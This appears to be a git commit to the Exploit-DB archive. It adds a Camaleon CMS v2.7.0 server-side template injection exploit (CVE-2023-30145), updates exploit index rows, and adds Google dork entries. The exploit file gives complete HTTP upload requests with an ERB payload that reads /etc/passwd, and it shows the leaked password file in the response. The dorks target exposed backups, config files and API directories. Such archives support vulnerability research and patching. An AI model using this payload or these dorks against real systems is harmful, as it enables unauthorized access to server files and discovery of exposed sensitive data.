DB: 2023-05-27

3 changes to exploits/shellcodes/ghdb Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) GetSimple CMS v3.3.16 - Remote Code Execution (RCE) SitemagicCMS 4.4.3 - Remote Code Execution (RCE) Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
2023-05-27 00:16:29 +00:00 · 2023-05-27 00:16:29 +00:00 · 9e36596021
commit 9e36596021
parent 9be142a874
3 changed files with 315 additions and 3 deletions
--- a/exploits/ruby/webapps/51489.txt
+++ b/exploits/ruby/webapps/51489.txt
@ -0,0 +1,175 @@
+Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
+Exploit Author: PARAG BAGUL
+CVE: CVE-2023-30145
+
+## Description
+Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template
+Injection (SSTI) vulnerability via the formats parameter.
+
+## Affected Component
+All versions below 2.7.0 are affected.
+
+## Author
+Parag Bagul
+
+## Steps to Reproduce
+1. Open the target URL: `https://target.com/admin/media/upload`
+2. Upload any file and intercept the request.
+3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`.
+4. Check the response. It should return the multiplication of 77 with the
+message "File format not allowed (dqopi49vuuvm)".
+
+##Detection:
+
+#Request:
+
+POST /admin/media/upload?actions=false HTTP/1.1
+Host: target.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target.com/admin/profile/edit
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------327175120238370517612522354688
+Content-Length: 1200
+Origin: http://target.com
+DNT: 1
+Connection: close
+Cookie: cookie
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="file_upload"; filename="test.txt"
+Content-Type: text/plain
+
+test
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="versions"
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="thumb_size"
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="formats"
+
+test<%= 7*7 %>test
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="media_formats"
+
+image
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="dimension"
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="private"
+
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="folder"
+
+/
+-----------------------------327175120238370517612522354688
+Content-Disposition: form-data; name="skip_auto_crop"
+
+true
+-----------------------------327175120238370517612522354688--
+
+#Response:
+
+HTTP/1.1 200 OK
+Content-Type: text/html; charset=utf-8
+Connection: close
+Status: 200 OK
+Cache-Control: max-age=0, private, must-revalidate
+Set-Cookie: cookie
+Content-Length: 41
+
+File format not allowed (test49test)
+
+#Exploitation:
+
+To execute a command, add the following payload:
+testqopi<%= File.open('/etc/passwd').read %>fdtest
+
+Request:
+
+POST /admin/media/upload?actions=true HTTP/1.1
+Host: target.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target.com/admin/media
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------104219633614133026962934729021
+Content-Length: 1237
+Origin: http://target.com
+DNT: 1
+Connection: close
+Cookie: cookie
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="file_upload"; filename="test.txt"
+Content-Type: text/plain
+
+test
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="versions"
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="thumb_size"
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="formats"
+
+dqopi<%= File.open('/etc/passwd').read %>fdfdsf
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="media_formats"
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="dimension"
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="private"
+
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="folder"
+
+/
+-----------------------------104219633614133026962934729021
+Content-Disposition: form-data; name="skip_auto_crop"
+
+true
+-----------------------------104219633614133026962934729021--
+
+Response:
+
+Response:
+
+HTTP/1.1 200 OK
+Content-Type: text/html; charset=utf-8
+Connection: close
+Status: 200 OK
+Set-Cookie: cookie
+Content-Length: 1816
+
+File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+fdfdsf)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -14879,7 +14879,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
 49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
 51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
-51476,exploits/php/webapps/51476.txt,"Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31698,,,,,
+51476,exploits/php/webapps/51476.txt,"Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-26,1,CVE-2023-31698,,,,,
 46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
 11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
 7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@ -19000,7 +19000,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery",2021-04-16,boku,webapps,php,,2021-04-16,2021-10-29,0,,,,,,
 49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting",2021-04-23,boku,webapps,php,,2021-04-23,2021-11-01,0,,,,,,
 48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,,2020-08-13,2020-08-13,0,,,,,,
-51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-23,0,CVE-2022-41544,,,,,
+51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-26,1,CVE-2022-41544,,,,,
 4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,webapps,php,,2007-12-17,2016-10-20,1,OSVDB-44780;CVE-2007-6476;OSVDB-44779;CVE-2007-6475;OSVDB-41376;CVE-2007-6474;OSVDB-41375,,,,http://www.exploit-db.comGF-3XPLORER_2.4_.rar,
 645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,,2004-11-20,,1,OSVDB-11626,,,,,http://www.zone-h.org/advisories/read/id=4904
 25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",webapps,php,,2005-05-24,2013-05-24,1,CVE-2005-1752;OSVDB-16930,,,,,https://www.securityfocus.com/bid/13716/info
@ -29517,7 +29517,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35877,exploits/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Directory Traversal",2011-06-23,"Andrea Bocchetti",webapps,php,,2011-06-23,2015-01-23,1,,,,,,https://www.securityfocus.com/bid/48399/info
 35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php,,2011-06-21,2015-01-23,1,OSVDB-73201,,,,,https://www.securityfocus.com/bid/48355/info
 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
-51464,exploits/php/webapps/51464.txt,"SitemagicCMS 4.4.3 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
+51464,exploits/php/webapps/51464.txt,"SitemagicCMS 4.4.3 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-26,1,,,,,,
 44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,,2018-05-29,2018-05-29,0,CVE-2018-11535,,,,,
 25052,exploits/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation (1)",2005-01-19,"Noam Rathaus",webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
 25053,exploits/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
@ -34520,6 +34520,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80,2016-07-11,2016-07-11,1,CVE-2016-2098,"Metasploit Framework (MSF)",,,,
 45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80,2018-10-15,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comalchemy_cms-4.1.0.tar.gz,
 45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80,2018-10-12,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comcamaleon-cms-2.4.0.tar.gz,
+51489,exploits/ruby/webapps/51489.txt,"Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)",2023-05-26,"PARAG BAGUL",webapps,ruby,,2023-05-26,2023-05-26,0,CVE-2023-30145,,,,,
 51446,exploits/ruby/webapps/51446.txt,"Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title",2023-05-23,"Yasin Gergin",webapps,ruby,,2023-05-23,2023-05-23,0,,,,,,
 46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80,2019-03-28,2019-03-29,0,CVE-2019-10226,,,,http://www.exploit-db.comfat_free_crm-0.18.1.tar.gz,
 41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,,2017-03-15,2017-03-27,1,,,,,,http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
--- a/ghdb.xml
+++ b/ghdb.xml
@ -40746,6 +40746,21 @@ Information about user data is obtained
  <date>2022-06-20</date>
  <author>Suman Das</author>
 </entry>
+ <entry>
+  <id>8188</id>
+  <link>https://www.exploit-db.com/ghdb/8188</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;index of &quot;main.yml&quot;</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;index of &quot;main.yml&quot;
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: muhammetadibas</textualDescription>
+  <query>Files Containing Juicy Info</query>
+  <querystring>https://www.google.com/search?q=Files Containing Juicy Info</querystring>
+  <edb></edb>
+  <date>2023-05-26</date>
+  <author>muhammetadibas</author>
+ </entry>
 <entry>
  <id>8175</id>
  <link>https://www.exploit-db.com/ghdb/8175</link>
@ -46387,6 +46402,21 @@ htdocs present in the respective url.
  <date>2022-06-16</date>
  <author>Ract Hack</author>
 </entry>
+ <entry>
+  <id>8191</id>
+  <link>https://www.exploit-db.com/ghdb/8191</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;index of&quot; github-api</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;index of&quot; github-api
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Midhya Mathew</textualDescription>
+  <query>intitle:&quot;index of&quot; github-api</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; github-api</querystring>
+  <edb></edb>
+  <date>2023-05-26</date>
+  <author>Midhya Mathew</author>
+ </entry>
 <entry>
  <id>7854</id>
  <link>https://www.exploit-db.com/ghdb/7854</link>
@ -46403,6 +46433,22 @@ htdocs present in the respective url.
  <date>2022-06-15</date>
  <author>Muhammad Al-Amin</author>
 </entry>
+ <entry>
+  <id>8192</id>
+  <link>https://www.exploit-db.com/ghdb/8192</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;index of&quot; google-maps-api</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;index of&quot; google-maps-api
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Midhya Mathew
+</textualDescription>
+  <query>intitle:&quot;index of&quot; google-maps-api</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; google-maps-api</querystring>
+  <edb></edb>
+  <date>2023-05-26</date>
+  <author>Midhya Mathew</author>
+ </entry>
 <entry>
  <id>7672</id>
  <link>https://www.exploit-db.com/ghdb/7672</link>
@ -46682,6 +46728,21 @@ Category: Files containing Juicy Info
  <date>2019-09-16</date>
  <author>The Dexter</author>
 </entry>
+ <entry>
+  <id>8193</id>
+  <link>https://www.exploit-db.com/ghdb/8193</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;Index of&quot; inurl:/backup/ &quot;admin.zip&quot;</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;Index of&quot; inurl:/backup/ &quot;admin.zip&quot;
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Midhya Mathew</textualDescription>
+  <query>intitle:&quot;Index of&quot; inurl:/backup/ &quot;admin.zip&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; inurl:/backup/ &quot;admin.zip&quot;</querystring>
+  <edb></edb>
+  <date>2023-05-26</date>
+  <author>Midhya Mathew</author>
+ </entry>
 <entry>
  <id>8101</id>
  <link>https://www.exploit-db.com/ghdb/8101</link>
@ -47739,6 +47800,21 @@ Sachin
  <date>2020-07-07</date>
  <author>Sachin Kattimani</author>
 </entry>
+ <entry>
+  <id>8190</id>
+  <link>https://www.exploit-db.com/ghdb/8190</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;Sharing API Info&quot;</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;Sharing API Info&quot;
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: dmr</textualDescription>
+  <query>intitle:&quot;Sharing API Info&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;Sharing API Info&quot;</querystring>
+  <edb></edb>
+  <date>2023-05-26</date>
+  <author>dmr</author>
+ </entry>
 <entry>
  <id>4268</id>
  <link>https://www.exploit-db.com/ghdb/4268</link>
@ -50377,6 +50453,21 @@ attachments</textualDescription>
  <date>2013-09-24</date>
  <author>anonymous</author>
 </entry>
+ <entry>
+  <id>8194</id>
+  <link>https://www.exploit-db.com/ghdb/8194</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:*/wp-content/plugins/contact-form-7/</shortDescription>
+  <textualDescription># Google Dork: inurl:*/wp-content/plugins/contact-form-7/
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Bappe Sarker</textualDescription>
+  <query>inurl:*/wp-content/plugins/contact-form-7/</query>
+  <querystring>https://www.google.com/search?q=inurl:*/wp-content/plugins/contact-form-7/</querystring>
+  <edb></edb>
+  <date>2023-05-26</date>
+  <author>Bappe Sarker</author>
+ </entry>
 <entry>
  <id>399</id>
  <link>https://www.exploit-db.com/ghdb/399</link>
@ -53336,6 +53427,21 @@ Mufeed VH
  <date>2018-08-06</date>
  <author>Mufeed VH</author>
 </entry>
+ <entry>
+  <id>8189</id>
+  <link>https://www.exploit-db.com/ghdb/8189</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:uploadimage.php</shortDescription>
+  <textualDescription># Google Dork: inurl:uploadimage.php
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: muhammetadibas</textualDescription>
+  <query>Vulnerable Files</query>
+  <querystring>https://www.google.com/search?q=Vulnerable Files</querystring>
+  <edb></edb>
+  <date>2023-05-26</date>
+  <author>muhammetadibas</author>
+ </entry>
 <entry>
  <id>8185</id>
  <link>https://www.exploit-db.com/ghdb/8185</link>
@ -54062,6 +54168,21 @@ https://ch.linkedin.com/in/schmidbruno
  <date>2005-09-08</date>
  <author>anonymous</author>
 </entry>
+ <entry>
+  <id>8195</id>
+  <link>https://www.exploit-db.com/ghdb/8195</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>Re: &quot;index of /backup.sql</shortDescription>
+  <textualDescription># Google Dork: index of /backup.sql
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Ramjan Ali Sabber</textualDescription>
+  <query>Re: &quot;index of /backup.sql</query>
+  <querystring>https://www.google.com/search?q=Re: &quot;index of /backup.sql</querystring>
+  <edb></edb>
+  <date>2023-05-26</date>
+  <author>Ramjan Ali Sabber</author>
+ </entry>
 <entry>
  <id>7966</id>
  <link>https://www.exploit-db.com/ghdb/7966</link>
@ -54107,6 +54228,21 @@ https://ch.linkedin.com/in/schmidbruno
  <date>2023-04-28</date>
  <author>Mohd S</author>
 </entry>
+ <entry>
+  <id>8196</id>
+  <link>https://www.exploit-db.com/ghdb/8196</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>Re: intitle:index.of conf.php</shortDescription>
+  <textualDescription># Google Dork: intitle:index.of conf.php
+# Files Containing Juicy Info
+# Date:26/05/2023
+# Exploit Author: Ramjan Ali Sabber</textualDescription>
+  <query>Re: intitle:index.of conf.php</query>
+  <querystring>https://www.google.com/search?q=Re: intitle:index.of conf.php</querystring>
+  <edb></edb>
+  <date>2023-05-26</date>
+  <author>Ramjan Ali Sabber</author>
+ </entry>
 <entry>
  <id>31</id>
  <link>https://www.exploit-db.com/ghdb/31</link>